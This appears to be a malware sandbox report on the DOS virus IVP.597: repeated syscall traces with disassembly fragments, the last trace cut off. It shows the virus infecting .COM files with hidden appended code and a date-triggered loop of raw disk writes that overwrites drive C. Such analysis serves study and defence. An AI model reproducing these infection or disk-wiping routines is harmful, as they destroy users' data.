Sample viewer

vx.netlux.org/Virus.DOS.IVP.597

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-17T22:58:15.478873473Z 26 PC: 13faf | Set disk transfer address
2018-12-17T22:58:15.481129647Z 53 PC: 13e69 | Get interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-17T22:58:15.482848714Z 37 PC: 13e80 | Set interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-17T22:58:15.48437881Z 71 PC: 13e92 | Get current directory
2018-12-17T22:58:15.487955683Z 78 PC: 13ed6 | Find first file
2018-12-17T22:58:15.495584237Z 61 PC: 13fba | Open file (Filename = 'SLEEP.COM')
2018-12-17T22:58:15.503447599Z 63 PC: 13ef9 | Read file or device (Read 26 bytes on handle 5)
2018-12-17T22:58:15.51066698Z 62 PC: 13eff | Close file
2018-12-17T22:58:15.513728865Z 67 PC: 1400b | Get or set file attributes
2018-12-17T22:58:15.532683514Z 61 PC: 13fba | Open file (Filename = 'SLEEP.COM')
2018-12-17T22:58:15.540976202Z 64 PC: 13f5a | Write file or device (Write 3 bytes on handle 5)
2018-12-17T22:58:15.545625114Z 66 PC: 13fa9 | Move file pointer
2018-12-17T22:58:15.547581502Z 44 PC: 13f69 | Get time 0x13f69: nop
0x13f6a: cmp dh, 0
0x13f6d: nop
0x13f6e: je 0x13f64
0x13f70: nop
0x13f71: mov byte ptr cs:[bp + 0x357], dh
0x13f76: nop
0x13f77: call 0x14030
0x13f7a: mov ax, 0x5701
0x13f7d: nop
0x13f7e: mov cx, word ptr cs:[bp + 0x3d7]
0x13f83: nop
0x13f84: mov dx, word ptr cs:[bp + 0x3d9]
0x13f89: nop
0x13f8a: int 0x21
0x13f8c: mov ah, 0x3e
0x13f8e: nop
0x13f8f: int 0x21
0x13f91: xor cx, cx
0x13f93: nop
2018-12-17T22:58:15.550580293Z 64 PC: 140b0 | Write file or device (Write 597 bytes on handle 5)
2018-12-17T22:58:15.560685088Z 87 PC: 13f8c | Get or set file date and time
2018-12-17T22:58:15.563588356Z 62 PC: 13f91 | Close file
2018-12-17T22:58:15.584846294Z 67 PC: 1400b | Get or set file attributes
2018-12-17T22:58:15.598146431Z 79 PC: 13ed6 | Find next file
2018-12-17T22:58:15.601779017Z 61 PC: 13fba | Open file (Filename = 'PRINT.COM')
2018-12-17T22:58:15.609772563Z 63 PC: 13ef9 | Read file or device (Read 26 bytes on handle 5)
2018-12-17T22:58:15.617700683Z 62 PC: 13eff | Close file
2018-12-17T22:58:15.621133089Z 67 PC: 1400b | Get or set file attributes
2018-12-17T22:58:15.63313935Z 61 PC: 13fba | Open file (Filename = 'PRINT.COM')
2018-12-17T22:58:15.641340134Z 64 PC: 13f5a | Write file or device (Write 3 bytes on handle 5)
2018-12-17T22:58:15.64578596Z 66 PC: 13fa9 | Move file pointer
2018-12-17T22:58:15.647745819Z 44 PC: 13f69 | Get time 0x13f69: nop
0x13f6a: cmp dh, 0
0x13f6d: nop
0x13f6e: je 0x13f64
0x13f70: nop
0x13f71: mov byte ptr cs:[bp + 0x357], dh
0x13f76: nop
0x13f77: call 0x14030
0x13f7a: mov ax, 0x5701
0x13f7d: nop
0x13f7e: mov cx, word ptr cs:[bp + 0x3d7]
0x13f83: nop
0x13f84: mov dx, word ptr cs:[bp + 0x3d9]
0x13f89: nop
0x13f8a: int 0x21
0x13f8c: mov ah, 0x3e
0x13f8e: nop
0x13f8f: int 0x21
0x13f91: xor cx, cx
0x13f93: nop
2018-12-17T22:58:15.650876909Z 64 PC: 140b0 | Write file or device (Write 597 bytes on handle 5)
2018-12-17T22:58:15.661630759Z 87 PC: 13f8c | Get or set file date and time
2018-12-17T22:58:15.663525616Z 62 PC: 13f91 | Close file
2018-12-17T22:58:15.672236153Z 67 PC: 1400b | Get or set file attributes
2018-12-17T22:58:15.684259601Z 79 PC: 13ed6 | Find next file
2018-12-17T22:58:15.687746289Z 61 PC: 13fba | Open file (Filename = 'HELLO.COM')
2018-12-17T22:58:15.715878783Z 63 PC: 13ef9 | Read file or device (Read 26 bytes on handle 5)
2018-12-17T22:58:15.731809272Z 62 PC: 13eff | Close file
2018-12-17T22:58:15.742882145Z 67 PC: 1400b | Get or set file attributes
2018-12-17T22:58:15.753981966Z 61 PC: 13fba | Open file (Filename = 'HELLO.COM')
2018-12-17T22:58:15.762651535Z 64 PC: 13f5a | Write file or device (Write 3 bytes on handle 5)
2018-12-17T22:58:15.766577338Z 66 PC: 13fa9 | Move file pointer
2018-12-17T22:58:15.7687534Z 44 PC: 13f69 | Get time 0x13f69: nop
0x13f6a: cmp dh, 0
0x13f6d: nop
0x13f6e: je 0x13f64
0x13f70: nop
0x13f71: mov byte ptr cs:[bp + 0x357], dh
0x13f76: nop
0x13f77: call 0x14030
0x13f7a: mov ax, 0x5701
0x13f7d: nop
0x13f7e: mov cx, word ptr cs:[bp + 0x3d7]
0x13f83: nop
0x13f84: mov dx, word ptr cs:[bp + 0x3d9]
0x13f89: nop
0x13f8a: int 0x21
0x13f8c: mov ah, 0x3e
0x13f8e: nop
0x13f8f: int 0x21
0x13f91: xor cx, cx
0x13f93: nop
2018-12-17T22:58:15.772154357Z 64 PC: 140b0 | Write file or device (Write 597 bytes on handle 5)
2018-12-17T22:58:15.784862837Z 87 PC: 13f8c | Get or set file date and time
2018-12-17T22:58:15.78684217Z 62 PC: 13f91 | Close file
2018-12-17T22:58:15.795536258Z 67 PC: 1400b | Get or set file attributes
2018-12-17T22:58:15.807058428Z 79 PC: 13ed6 | Find next file
2018-12-17T22:58:15.810597871Z 61 PC: 13fba | Open file (Filename = 'PHANG.COM')
2018-12-17T22:58:15.818936657Z 63 PC: 13ef9 | Read file or device (Read 26 bytes on handle 5)
2018-12-17T22:58:15.827369597Z 62 PC: 13eff | Close file
2018-12-17T22:58:15.830966359Z 67 PC: 1400b | Get or set file attributes
2018-12-17T22:58:15.842086474Z 61 PC: 13fba | Open file (Filename = 'PHANG.COM')
2018-12-17T22:58:15.850312388Z 64 PC: 13f5a | Write file or device (Write 3 bytes on handle 5)
2018-12-17T22:58:15.853822055Z 66 PC: 13fa9 | Move file pointer
2018-12-17T22:58:15.855677428Z 44 PC: 13f69 | Get time 0x13f69: nop
0x13f6a: cmp dh, 0
0x13f6d: nop
0x13f6e: je 0x13f64
0x13f70: nop
0x13f71: mov byte ptr cs:[bp + 0x357], dh
0x13f76: nop
0x13f77: call 0x14030
0x13f7a: mov ax, 0x5701
0x13f7d: nop
0x13f7e: mov cx, word ptr cs:[bp + 0x3d7]
0x13f83: nop
0x13f84: mov dx, word ptr cs:[bp + 0x3d9]
0x13f89: nop
0x13f8a: int 0x21
0x13f8c: mov ah, 0x3e
0x13f8e: nop
0x13f8f: int 0x21
0x13f91: xor cx, cx
0x13f93: nop
2018-12-17T22:58:15.858865191Z 64 PC: 140b0 | Write file or device (Write 597 bytes on handle 5)
2018-12-17T22:58:15.868215Z 87 PC: 13f8c | Get or set file date and time
2018-12-17T22:58:15.870310772Z 62 PC: 13f91 | Close file
2018-12-17T22:58:15.878769193Z 67 PC: 1400b | Get or set file attributes
2018-12-17T22:58:15.89017716Z 79 PC: 13ed6 | Find next file
2018-12-17T22:58:15.893306762Z 61 PC: 13fba | Open file (Filename = 'PRINTA~1.COM')
2018-12-17T22:58:15.901185108Z 63 PC: 13ef9 | Read file or device (Read 26 bytes on handle 5)
2018-12-17T22:58:15.908570988Z 62 PC: 13eff | Close file
2018-12-17T22:58:15.910884991Z 67 PC: 1400b | Get or set file attributes
2018-12-17T22:58:15.915970468Z 61 PC: 13fba | Open file (Filename = 'PRINTA~1.COM�')
2018-12-17T22:58:15.922085473Z 42 PC: 13fc6 | Get date 0x13fc6: cmp al, 6
0x13fc8: nop
0x13fc9: je 0x13fd0
0x13fcb: mov ah, 0x4c
0x13fcd: nop
0x13fce: int 0x21
0x13fd0: mov byte ptr cs:[0x2ec], 0
0x13fd6: nop
0x13fd7: jmp 0x13fd9
0x13fd9: mov al, 2
0x13fdb: mov cx, 0xa0
0x13fde: mov dx, 0
0x13fe1: nop
0x13fe2: mov bx, 0
0x13fe5: int 0x26
0x13fe7: inc byte ptr cs:[0x2ec]
0x13fec: cmp byte ptr cs:[0x2ec], 0xa
0x13ff2: jne 0x13fd9
0x13ff4: mov ah, 9
0x13ff6: nop
2018-12-17T22:58:15.924963059Z 76 PC: 13fd0 | Terminate with return code (Return code = '1')

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":true,"OriginalID":12812,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:36:37.638605006Z 26 PC: 13faf | Set disk transfer address
2018-12-25T12:36:37.640132373Z 53 PC: 13e69 | Get interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T12:36:37.641301203Z 37 PC: 13e80 | Set interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T12:36:37.642385343Z 71 PC: 13e92 | Get current directory
2018-12-25T12:36:37.645587706Z 78 PC: 13ed6 | Find first file
2018-12-25T12:36:37.652107505Z 61 PC: 13fba | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:36:37.659152668Z 63 PC: 13ef9 | Read file or device (Read 26 bytes on handle 5)
2018-12-25T12:36:37.666499503Z 62 PC: 13eff | Close file
2018-12-25T12:36:37.668577168Z 67 PC: 1400b | Get or set file attributes
2018-12-25T12:36:37.963108965Z 61 PC: 13fba | Open file (See above)
2018-12-25T12:36:37.971819231Z 64 PC: 13f5a | Write file or device (Write 3 bytes on handle 5)
2018-12-25T12:36:37.975739236Z 66 PC: 13fa9 | Move file pointer
2018-12-25T12:36:37.977687103Z 44 PC: 13f69 | Get time 0x13f69: nop
0x13f6a: cmp dh, 0
0x13f6d: nop
0x13f6e: je 0x13f64
0x13f70: nop
0x13f71: mov byte ptr cs:[bp + 0x357], dh
0x13f76: nop
0x13f77: call 0x14030
0x13f7a: mov ax, 0x5701
0x13f7d: nop
0x13f7e: mov cx, word ptr cs:[bp + 0x3d7]
0x13f83: nop
0x13f84: mov dx, word ptr cs:[bp + 0x3d9]
0x13f89: nop
0x13f8a: int 0x21
0x13f8c: mov ah, 0x3e
0x13f8e: nop
0x13f8f: int 0x21
0x13f91: xor cx, cx
0x13f93: nop
2018-12-25T12:36:37.980798857Z 64 PC: 140b0 | Write file or device (Write 597 bytes on handle 5)
2018-12-25T12:36:37.992241424Z 87 PC: 13f8c | Get or set file date and time
2018-12-25T12:36:37.993986676Z 62 PC: 13f91 | Close file
2018-12-25T12:36:38.001319189Z 67 PC: 1400b | Get or set file attributes (See above)
2018-12-25T12:36:38.009201585Z 79 PC: 13ed6 | Find next file (See above)
2018-12-25T12:36:38.011969232Z 61 PC: 13fba | Open file (See above)
2018-12-25T12:36:38.017277683Z 63 PC: 13ef9 | Read file or device (See above)
2018-12-25T12:36:38.022902328Z 62 PC: 13eff | Close file (See above)
2018-12-25T12:36:38.024495738Z 67 PC: 1400b | Get or set file attributes (See above)
2018-12-25T12:36:38.033767242Z 61 PC: 13fba | Open file (See above)
2018-12-25T12:36:38.040995905Z 64 PC: 13f5a | Write file or device (See above)
2018-12-25T12:36:38.045987343Z 66 PC: 13fa9 | Move file pointer (See above)
2018-12-25T12:36:38.04722193Z 44 PC: 13f69 | Get time (See above)
2018-12-25T12:36:38.04951906Z 64 PC: 140b0 | Write file or device (See above)
2018-12-25T12:36:38.055613971Z 87 PC: 13f8c | Get or set file date and time (See above)
2018-12-25T12:36:38.057342616Z 62 PC: 13f91 | Close file (See above)
2018-12-25T12:36:38.185424728Z 67 PC: 1400b | Get or set file attributes (See above)
2018-12-25T12:36:38.306016235Z 79 PC: 13ed6 | Find next file (See above)
2018-12-25T12:36:38.310006206Z 61 PC: 13fba | Open file (See above)
2018-12-25T12:36:38.3180301Z 63 PC: 13ef9 | Read file or device (See above)
2018-12-25T12:36:38.326899642Z 62 PC: 13eff | Close file (See above)
2018-12-25T12:36:38.328857542Z 67 PC: 1400b | Get or set file attributes (See above)
2018-12-25T12:36:38.401510185Z 61 PC: 13fba | Open file (See above)
2018-12-25T12:36:38.41213556Z 64 PC: 13f5a | Write file or device (See above)
2018-12-25T12:36:38.416050838Z 66 PC: 13fa9 | Move file pointer (See above)
2018-12-25T12:36:38.427370166Z 44 PC: 13f69 | Get time (See above)
2018-12-25T12:36:38.434820553Z 64 PC: 140b0 | Write file or device (See above)
2018-12-25T12:36:38.447469586Z 87 PC: 13f8c | Get or set file date and time (See above)
2018-12-25T12:36:38.450482702Z 62 PC: 13f91 | Close file (See above)
2018-12-25T12:36:38.460548491Z 67 PC: 1400b | Get or set file attributes (See above)
2018-12-25T12:36:38.473900195Z 79 PC: 13ed6 | Find next file (See above)
2018-12-25T12:36:38.477145283Z 61 PC: 13fba | Open file (See above)
2018-12-25T12:36:38.484949472Z 63 PC: 13ef9 | Read file or device (See above)
2018-12-25T12:36:38.493310014Z 62 PC: 13eff | Close file (See above)
2018-12-25T12:36:38.495830294Z 67 PC: 1400b | Get or set file attributes (See above)
2018-12-25T12:36:38.50936085Z 61 PC: 13fba | Open file (See above)
2018-12-25T12:36:38.520946685Z 64 PC: 13f5a | Write file or device (See above)
2018-12-25T12:36:38.524909479Z 66 PC: 13fa9 | Move file pointer (See above)
2018-12-25T12:36:38.526878014Z 44 PC: 13f69 | Get time (See above)
2018-12-25T12:36:38.530858089Z 64 PC: 140b0 | Write file or device (See above)
2018-12-25T12:36:38.541908251Z 87 PC: 13f8c | Get or set file date and time (See above)
2018-12-25T12:36:38.544021397Z 62 PC: 13f91 | Close file (See above)
2018-12-25T12:36:38.553619864Z 67 PC: 1400b | Get or set file attributes (See above)
2018-12-25T12:36:38.56608977Z 79 PC: 13ed6 | Find next file (See above)
2018-12-25T12:36:38.569563831Z 61 PC: 13fba | Open file (See above)
2018-12-25T12:36:38.577414457Z 63 PC: 13ef9 | Read file or device (See above)
2018-12-25T12:36:38.587010285Z 62 PC: 13eff | Close file (See above)
2018-12-25T12:36:38.589618261Z 67 PC: 1400b | Get or set file attributes (See above)
2018-12-25T12:36:38.595031325Z 61 PC: 13fba | Open file (See above)
2018-12-25T12:36:38.601781416Z 42 PC: 13fc6 | Get date 0x13fc6: cmp al, 6
0x13fc8: nop
0x13fc9: je 0x13fd0
0x13fcb: mov ah, 0x4c
0x13fcd: nop
0x13fce: int 0x21
0x13fd0: mov byte ptr cs:[0x2ec], 0
0x13fd6: nop
0x13fd7: jmp 0x13fd9
0x13fd9: mov al, 2
0x13fdb: mov cx, 0xa0
0x13fde: mov dx, 0
0x13fe1: nop
0x13fe2: mov bx, 0
0x13fe5: int 0x26
0x13fe7: inc byte ptr cs:[0x2ec]
0x13fec: cmp byte ptr cs:[0x2ec], 0xa
0x13ff2: jne 0x13fd9
0x13ff4: mov ah, 9
0x13ff6: nop
2018-12-25T12:36:38.604722577Z 76 PC: 13fd0 | Terminate with return code (Return code = '2')

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":true,"OriginalID":12812,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:36:38.057643904Z 26 PC: 13faf | Set disk transfer address
2018-12-25T12:36:38.060055375Z 53 PC: 13e69 | Get interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T12:36:38.061197045Z 37 PC: 13e80 | Set interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T12:36:38.062565376Z 71 PC: 13e92 | Get current directory
2018-12-25T12:36:38.066301339Z 78 PC: 13ed6 | Find first file
2018-12-25T12:36:38.072075391Z 61 PC: 13fba | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:36:38.078425656Z 63 PC: 13ef9 | Read file or device (Read 26 bytes on handle 5)
2018-12-25T12:36:38.084940246Z 62 PC: 13eff | Close file
2018-12-25T12:36:38.08667503Z 67 PC: 1400b | Get or set file attributes
2018-12-25T12:36:39.586890419Z 61 PC: 13fba | Open file (See above)
2018-12-25T12:36:39.59399582Z 64 PC: 13f5a | Write file or device (Write 3 bytes on handle 5)
2018-12-25T12:36:39.597250011Z 66 PC: 13fa9 | Move file pointer
2018-12-25T12:36:39.598891495Z 44 PC: 13f69 | Get time 0x13f69: nop
0x13f6a: cmp dh, 0
0x13f6d: nop
0x13f6e: je 0x13f64
0x13f70: nop
0x13f71: mov byte ptr cs:[bp + 0x357], dh
0x13f76: nop
0x13f77: call 0x14030
0x13f7a: mov ax, 0x5701
0x13f7d: nop
0x13f7e: mov cx, word ptr cs:[bp + 0x3d7]
0x13f83: nop
0x13f84: mov dx, word ptr cs:[bp + 0x3d9]
0x13f89: nop
0x13f8a: int 0x21
0x13f8c: mov ah, 0x3e
0x13f8e: nop
0x13f8f: int 0x21
0x13f91: xor cx, cx
0x13f93: nop
2018-12-25T12:36:39.601968487Z 64 PC: 140b0 | Write file or device (Write 597 bytes on handle 5)
2018-12-25T12:36:39.61238742Z 87 PC: 13f8c | Get or set file date and time
2018-12-25T12:36:39.614183805Z 62 PC: 13f91 | Close file
2018-12-25T12:36:39.630400756Z 67 PC: 1400b | Get or set file attributes (See above)
2018-12-25T12:36:39.659395875Z 79 PC: 13ed6 | Find next file (See above)
2018-12-25T12:36:39.662271052Z 61 PC: 13fba | Open file (See above)
2018-12-25T12:36:39.669389058Z 63 PC: 13ef9 | Read file or device (See above)
2018-12-25T12:36:39.678217593Z 62 PC: 13eff | Close file (See above)
2018-12-25T12:36:39.681009238Z 67 PC: 1400b | Get or set file attributes (See above)
2018-12-25T12:36:39.692310703Z 61 PC: 13fba | Open file (See above)
2018-12-25T12:36:39.700911029Z 64 PC: 13f5a | Write file or device (See above)
2018-12-25T12:36:39.704047106Z 66 PC: 13fa9 | Move file pointer (See above)
2018-12-25T12:36:39.705801043Z 44 PC: 13f69 | Get time (See above)
2018-12-25T12:36:39.709926192Z 64 PC: 140b0 | Write file or device (See above)
2018-12-25T12:36:39.718434173Z 87 PC: 13f8c | Get or set file date and time (See above)
2018-12-25T12:36:39.720246991Z 62 PC: 13f91 | Close file (See above)
2018-12-25T12:36:39.7294055Z 67 PC: 1400b | Get or set file attributes (See above)
2018-12-25T12:36:39.75358155Z 79 PC: 13ed6 | Find next file (See above)
2018-12-25T12:36:39.756240209Z 61 PC: 13fba | Open file (See above)
2018-12-25T12:36:39.764407527Z 63 PC: 13ef9 | Read file or device (See above)
2018-12-25T12:36:39.77718487Z 62 PC: 13eff | Close file (See above)
2018-12-25T12:36:39.77928328Z 67 PC: 1400b | Get or set file attributes (See above)
2018-12-25T12:36:39.798734563Z 61 PC: 13fba | Open file (See above)
2018-12-25T12:36:39.806970125Z 64 PC: 13f5a | Write file or device (See above)
2018-12-25T12:36:39.810108196Z 66 PC: 13fa9 | Move file pointer (See above)
2018-12-25T12:36:39.811950831Z 44 PC: 13f69 | Get time (See above)
2018-12-25T12:36:39.815058944Z 64 PC: 140b0 | Write file or device (See above)
2018-12-25T12:36:39.832751243Z 87 PC: 13f8c | Get or set file date and time (See above)
2018-12-25T12:36:39.834837042Z 62 PC: 13f91 | Close file (See above)
2018-12-25T12:36:40.087367025Z 67 PC: 1400b | Get or set file attributes (See above)
2018-12-25T12:36:40.157952419Z 79 PC: 13ed6 | Find next file (See above)
2018-12-25T12:36:40.164429062Z 61 PC: 13fba | Open file (See above)
2018-12-25T12:36:40.176121946Z 63 PC: 13ef9 | Read file or device (See above)
2018-12-25T12:36:40.182960199Z 62 PC: 13eff | Close file (See above)
2018-12-25T12:36:40.185088302Z 67 PC: 1400b | Get or set file attributes (See above)
2018-12-25T12:36:40.520952183Z 61 PC: 13fba | Open file (See above)
2018-12-25T12:36:40.528942667Z 64 PC: 13f5a | Write file or device (See above)
2018-12-25T12:36:40.534019374Z 66 PC: 13fa9 | Move file pointer (See above)
2018-12-25T12:36:40.537298287Z 44 PC: 13f69 | Get time (See above)
2018-12-25T12:36:40.540987196Z 64 PC: 140b0 | Write file or device (See above)
2018-12-25T12:36:40.557919872Z 87 PC: 13f8c | Get or set file date and time (See above)
2018-12-25T12:36:40.560680281Z 62 PC: 13f91 | Close file (See above)
2018-12-25T12:36:40.569033385Z 67 PC: 1400b | Get or set file attributes (See above)
2018-12-25T12:36:40.579459243Z 79 PC: 13ed6 | Find next file (See above)
2018-12-25T12:36:40.583206346Z 61 PC: 13fba | Open file (See above)
2018-12-25T12:36:40.590378003Z 63 PC: 13ef9 | Read file or device (See above)
2018-12-25T12:36:40.597222449Z 62 PC: 13eff | Close file (See above)
2018-12-25T12:36:40.600157345Z 67 PC: 1400b | Get or set file attributes (See above)
2018-12-25T12:36:40.605084391Z 61 PC: 13fba | Open file (See above)
2018-12-25T12:36:40.609781312Z 42 PC: 13fc6 | Get date 0x13fc6: cmp al, 6
0x13fc8: nop
0x13fc9: je 0x13fd0
0x13fcb: mov ah, 0x4c
0x13fcd: nop
0x13fce: int 0x21
0x13fd0: mov byte ptr cs:[0x2ec], 0
0x13fd6: nop
0x13fd7: jmp 0x13fd9
0x13fd9: mov al, 2
0x13fdb: mov cx, 0xa0
0x13fde: mov dx, 0
0x13fe1: nop
0x13fe2: mov bx, 0
0x13fe5: int 0x26
0x13fe7: inc byte ptr cs:[0x2ec]
0x13fec: cmp byte ptr cs:[0x2ec], 0xa
0x13ff2: jne 0x13fd9
0x13ff4: mov ah, 9
0x13ff6: nop
2018-12-25T12:36:40.612313709Z 76 PC: 13fd0 | Terminate with return code (Return code = '2')

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":1,"TimeBased":true,"OriginalID":12812,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:36:38.081027223Z 26 PC: 13faf | Set disk transfer address
2018-12-25T12:36:38.08274203Z 53 PC: 13e69 | Get interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T12:36:38.083925741Z 37 PC: 13e80 | Set interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T12:36:38.085065047Z 71 PC: 13e92 | Get current directory
2018-12-25T12:36:38.088101043Z 78 PC: 13ed6 | Find first file
2018-12-25T12:36:38.095006128Z 61 PC: 13fba | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:36:38.107449251Z 63 PC: 13ef9 | Read file or device (Read 26 bytes on handle 5)
2018-12-25T12:36:38.114577927Z 62 PC: 13eff | Close file
2018-12-25T12:36:38.128522965Z 67 PC: 1400b | Get or set file attributes
2018-12-25T12:36:38.401781324Z 61 PC: 13fba | Open file (See above)
2018-12-25T12:36:38.409360024Z 64 PC: 13f5a | Write file or device (Write 3 bytes on handle 5)
2018-12-25T12:36:38.415314266Z 66 PC: 13fa9 | Move file pointer
2018-12-25T12:36:38.420459783Z 44 PC: 13f69 | Get time 0x13f69: nop
0x13f6a: cmp dh, 0
0x13f6d: nop
0x13f6e: je 0x13f64
0x13f70: nop
0x13f71: mov byte ptr cs:[bp + 0x357], dh
0x13f76: nop
0x13f77: call 0x14030
0x13f7a: mov ax, 0x5701
0x13f7d: nop
0x13f7e: mov cx, word ptr cs:[bp + 0x3d7]
0x13f83: nop
0x13f84: mov dx, word ptr cs:[bp + 0x3d9]
0x13f89: nop
0x13f8a: int 0x21
0x13f8c: mov ah, 0x3e
0x13f8e: nop
0x13f8f: int 0x21
0x13f91: xor cx, cx
0x13f93: nop
2018-12-25T12:36:38.42402321Z 64 PC: 140b0 | Write file or device (Write 597 bytes on handle 5)
2018-12-25T12:36:38.434624892Z 87 PC: 13f8c | Get or set file date and time
2018-12-25T12:36:38.436965427Z 62 PC: 13f91 | Close file
2018-12-25T12:36:38.446700843Z 67 PC: 1400b | Get or set file attributes (See above)
2018-12-25T12:36:38.468298481Z 79 PC: 13ed6 | Find next file (See above)
2018-12-25T12:36:38.471844977Z 61 PC: 13fba | Open file (See above)
2018-12-25T12:36:38.479648319Z 63 PC: 13ef9 | Read file or device (See above)
2018-12-25T12:36:38.48785786Z 62 PC: 13eff | Close file (See above)
2018-12-25T12:36:38.491526816Z 67 PC: 1400b | Get or set file attributes (See above)
2018-12-25T12:36:38.503544767Z 61 PC: 13fba | Open file (See above)
2018-12-25T12:36:38.511978Z 64 PC: 13f5a | Write file or device (See above)
2018-12-25T12:36:38.516434195Z 66 PC: 13fa9 | Move file pointer (See above)
2018-12-25T12:36:38.518441737Z 44 PC: 13f69 | Get time (See above)
2018-12-25T12:36:38.522145672Z 64 PC: 140b0 | Write file or device (See above)
2018-12-25T12:36:38.53316004Z 87 PC: 13f8c | Get or set file date and time (See above)
2018-12-25T12:36:38.535390568Z 62 PC: 13f91 | Close file (See above)
2018-12-25T12:36:38.545460095Z 67 PC: 1400b | Get or set file attributes (See above)
2018-12-25T12:36:38.558321282Z 79 PC: 13ed6 | Find next file (See above)
2018-12-25T12:36:38.561815414Z 61 PC: 13fba | Open file (See above)
2018-12-25T12:36:38.569616868Z 63 PC: 13ef9 | Read file or device (See above)
2018-12-25T12:36:38.578175485Z 62 PC: 13eff | Close file (See above)
2018-12-25T12:36:38.581088999Z 67 PC: 1400b | Get or set file attributes (See above)
2018-12-25T12:36:38.593028666Z 61 PC: 13fba | Open file (See above)
2018-12-25T12:36:38.601655902Z 64 PC: 13f5a | Write file or device (See above)
2018-12-25T12:36:38.605732695Z 66 PC: 13fa9 | Move file pointer (See above)
2018-12-25T12:36:38.607145362Z 44 PC: 13f69 | Get time (See above)
2018-12-25T12:36:38.609618238Z 64 PC: 140b0 | Write file or device (See above)
2018-12-25T12:36:38.619026146Z 87 PC: 13f8c | Get or set file date and time (See above)
2018-12-25T12:36:38.621611381Z 62 PC: 13f91 | Close file (See above)
2018-12-25T12:36:38.63185549Z 67 PC: 1400b | Get or set file attributes (See above)
2018-12-25T12:36:38.64423677Z 79 PC: 13ed6 | Find next file (See above)
2018-12-25T12:36:38.648288382Z 61 PC: 13fba | Open file (See above)
2018-12-25T12:36:38.656054683Z 63 PC: 13ef9 | Read file or device (See above)
2018-12-25T12:36:38.666136215Z 62 PC: 13eff | Close file (See above)
2018-12-25T12:36:38.668631159Z 67 PC: 1400b | Get or set file attributes (See above)
2018-12-25T12:36:38.679198052Z 61 PC: 13fba | Open file (See above)
2018-12-25T12:36:38.686276688Z 64 PC: 13f5a | Write file or device (See above)
2018-12-25T12:36:38.690399702Z 66 PC: 13fa9 | Move file pointer (See above)
2018-12-25T12:36:38.692610922Z 44 PC: 13f69 | Get time (See above)
2018-12-25T12:36:38.697026018Z 64 PC: 140b0 | Write file or device (See above)
2018-12-25T12:36:38.709051432Z 87 PC: 13f8c | Get or set file date and time (See above)
2018-12-25T12:36:38.711121082Z 62 PC: 13f91 | Close file (See above)
2018-12-25T12:36:38.720350565Z 67 PC: 1400b | Get or set file attributes (See above)
2018-12-25T12:36:38.732194327Z 79 PC: 13ed6 | Find next file (See above)
2018-12-25T12:36:38.735572229Z 61 PC: 13fba | Open file (See above)
2018-12-25T12:36:38.743560656Z 63 PC: 13ef9 | Read file or device (See above)
2018-12-25T12:36:38.74875273Z 62 PC: 13eff | Close file (See above)
2018-12-25T12:36:38.750151614Z 67 PC: 1400b | Get or set file attributes (See above)
2018-12-25T12:36:38.754522224Z 61 PC: 13fba | Open file (See above)
2018-12-25T12:36:38.757693784Z 42 PC: 13fc6 | Get date 0x13fc6: cmp al, 6
0x13fc8: nop
0x13fc9: je 0x13fd0
0x13fcb: mov ah, 0x4c
0x13fcd: nop
0x13fce: int 0x21
0x13fd0: mov byte ptr cs:[0x2ec], 0
0x13fd6: nop
0x13fd7: jmp 0x13fd9
0x13fd9: mov al, 2
0x13fdb: mov cx, 0xa0
0x13fde: mov dx, 0
0x13fe1: nop
0x13fe2: mov bx, 0
0x13fe5: int 0x26
0x13fe7: inc byte ptr cs:[0x2ec]
0x13fec: cmp byte ptr cs:[0x2ec], 0xa
0x13ff2: jne 0x13fd9
0x13ff4: mov ah, 9
0x13ff6: nop
2018-12-25T12:36:38.759187949Z 76 PC: 13fd0 | Terminate with return code (Return code = '2')

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":1,"TimeBased":true,"OriginalID":12812,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:36:38.119667452Z 26 PC: 13faf | Set disk transfer address
2018-12-25T12:36:38.121149138Z 53 PC: 13e69 | Get interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T12:36:38.122373843Z 37 PC: 13e80 | Set interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T12:36:38.123309432Z 71 PC: 13e92 | Get current directory
2018-12-25T12:36:38.126435771Z 78 PC: 13ed6 | Find first file
2018-12-25T12:36:38.132504759Z 61 PC: 13fba | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:36:38.143664761Z 63 PC: 13ef9 | Read file or device (Read 26 bytes on handle 5)
2018-12-25T12:36:38.149959569Z 62 PC: 13eff | Close file
2018-12-25T12:36:38.152018647Z 67 PC: 1400b | Get or set file attributes
2018-12-25T12:36:39.579492407Z 61 PC: 13fba | Open file (See above)
2018-12-25T12:36:39.596674667Z 64 PC: 13f5a | Write file or device (Write 3 bytes on handle 5)
2018-12-25T12:36:39.602347129Z 66 PC: 13fa9 | Move file pointer
2018-12-25T12:36:39.603667473Z 44 PC: 13f69 | Get time 0x13f69: nop
0x13f6a: cmp dh, 0
0x13f6d: nop
0x13f6e: je 0x13f64
0x13f70: nop
0x13f71: mov byte ptr cs:[bp + 0x357], dh
0x13f76: nop
0x13f77: call 0x14030
0x13f7a: mov ax, 0x5701
0x13f7d: nop
